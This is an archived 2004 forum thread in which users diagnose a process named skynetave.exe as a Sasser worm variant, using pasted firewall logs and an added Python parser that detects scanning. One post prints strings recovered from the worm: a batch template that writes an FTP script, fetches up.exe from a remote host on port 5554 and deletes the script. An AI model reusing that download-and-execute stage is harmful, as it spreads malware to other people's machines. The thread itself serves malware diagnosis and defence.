EoS
OK, I found the process skynetave.exe running on my system, no idea where it comes from! My firewall says it tries to access random IPs like crazy, on port 445 I think!
Can anyone try to analyze this thing?
T3cHn0b0y
Sounds like a new lsass.exe RPC worm to me. Go to windows update and patch your computer. After you've done this, install a good AV and remove the thing.
EoS
See, that's the problem... I've been patched all the time, and my AV doesn't pick it up either!
It's pretty strange though that it tries connecting to all those IPs...
I also tried the Sasser fixtool, nothing found!

Here's an extract from my firewall's log:

ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (17.241.91.85).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.21.248).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.222.183.127).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.72.23).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (86.133.116.59).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.73.151.249).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (53.147.40.52).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (244.19.241.31).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.234.196).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.165.163.151).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (191.167.186.38).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.31.102).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (56.101.23.212).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (252.38.213.174).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.29.70.145).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (175.120.253.21).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.68.136).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.143.102).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.208.207).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (70.67.90.9).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.26.153).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.50.182.159).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.73.164).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (239.45.48.75).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.187.239).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (123.30.13.141).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.230.23).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (68.88.113.17).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (124.35.118.214).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.11.250.195).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (8.200.69.141).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (73.106.106.55).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (198.247.91.243).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (133.172.200.216).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.12.247).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (84.195.10.105).,N/A,N/A

Look at the times, and the random(?) IPs!
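Added example, not part of the thread: a small parser for the firewall log format pasted above, which groups blocked connections per process and per second and counts how many destinations fall in link-local, multicast or reserved address space, the pattern that separates random-IP scanning from normal client traffic. The sample lines and the threshold of five distinct destinations in one second are constructed for illustration.

```python
# Added example (not from the thread): spot worm-style scanning in a personal-
# firewall log of the comma-separated form quoted above. Sample lines constructed.
import ipaddress
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^ACCESS,(?P<date>[\d/]+),(?P<time>\d\d:\d\d:\d\d)[^,]*,"
    r"(?P<proc>\S+) was blocked from connecting to the Internet "
    r"\((?P<ip>[\d.]+)\)\.,"
)
SAMPLE_LOG = """\
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (17.241.91.85).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.21.248).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (244.19.241.31).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.72.23).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (239.45.48.75).,N/A,N/A
ACCESS,2004/05/03,13:23:19 +2:00 GMT,firefox.exe was blocked from connecting to the Internet (198.51.100.7).,N/A,N/A
"""

def parse(log_text):
    """Yield (timestamp, process, ip) for each line in the expected format."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield f"{m['date']} {m['time']}", m["proc"], m["ip"]

def classify(ip):
    """Label destinations a legitimate client would rarely pick on its own."""
    a = ipaddress.ip_address(ip)
    if a.is_link_local:
        return "link-local"  # 169.254/16 is never routed on the Internet
    if a.is_multicast:
        return "multicast"   # 224/4
    if a.is_reserved:
        return "reserved"    # 240/4
    return "routable"

def scan_report(log_text, min_unique=5):
    """Per process: the second with the most distinct blocked destinations,
    plus how many destinations fell in address space no real client would use."""
    per_sec, odd = defaultdict(set), defaultdict(int)
    for ts, proc, ip in parse(log_text):
        per_sec[(proc, ts)].add(ip)
        if classify(ip) != "routable":
            odd[proc] += 1
    report = {}
    for (proc, ts), ips in per_sec.items():
        best = report.get(proc)
        if len(ips) >= min_unique and (not best or len(ips) > best["unique_dests"]):
            report[proc] = {"burst_at": ts, "unique_dests": len(ips), "non_routable": odd[proc]}
    return report
```

On the sample, only skynetave.exe is reported: five distinct destinations within one second, four of them in address space that no browser or updater would ever be told to contact.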
B3T4
I haven't looked at the file, but looking at your log it ain't an ordinary scanner... If your AV doesn't pick it up, update your AV. It could also be a modded version of the worm though.
Killaloop
Let me guess... your IP is somewhere within this range, 169.254.xxx.xxx?
This is a new/hexed version of the lsass worm.

First it sends an ICMP echo request to random IPs and tries to exploit them afterwards.

Look into your registry, I'm sure the worm dropped something there.
kingvandal
I-Worm/Sasser.D.exe VIRUS, if you are still unsure. And get yourself some AV, quick like.

Rich
EoS
No, the 169* range is only a local network device of mine!
I checked the registry but didn't find anything...

I wonder if someone could reverse engineer that file or something!
@kingvandal
Thanks, where did you get that info? I use Norton AV and I only updated today!
tribalgoa
Run qfecheck.

W2K:
http://www.microsoft.com/downloads/details...6A-1BBF6E8BA288

XP:
http://www.microsoft.com/downloads/details...2A-BFAB8CFCCC03

This will show you if your patches are ACTUALLY installed... (this one actually checks files, not like the Windows Update site, which only checks registry keys).
silos
Could it be the NETSKY worm, or is Sasser the same thing?
EoS
Nah, it's not Netsky; I checked my PC with the Netsky fixtool and nothing found...
But the Sasser fixtool won't find that file either.
charon255
This is "SkynetSasserVersionWithPingFast" (one of many strings copped from running the worm code in a VM environment).

Still digging, but it looks and acts just like Sasser... e.g.:

(more strings)

CODE

skynetave.exe
echo off
echo open %s 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get %i
up.exe>>cmd.ftp
echo bye>>cmd.ftp
ftp -s:cmd.ftp
echo off
del cmd.ftp
echo on

127.0.0.1
c:\win2.log
\\%s\ipc
%i.%i.%i.%i
kingvandal
AVG, you know, the free AV scanner. I have not tested it yet on NOD32, later tonight though :-)

Rich
EoS
K, looks pretty Sasser-like I guess!
Thanks for all the great posts guys!
Vort3x
@EoS
Yup, you're absolutely right. It is for sure some kind of variant of Sasser. Sasser only uses port 445 (at least only the variants that I have tested). It just simply scans random IPs using your computer as a host, then it exploits, tries to get in and... well... the process continues, it's a worm. Install the patch from Microsoft and use that quick and fast scanner at the bottom of the page. Disable System Restore, get the fix tool from here. Read up on it there too if you'd like, possibly run that scanner in Safe Mode too. Then just run some more online scans to be sure that it's gone. Good luck.
Invision Power Board © 2001-2005 Invision Power Services, Inc.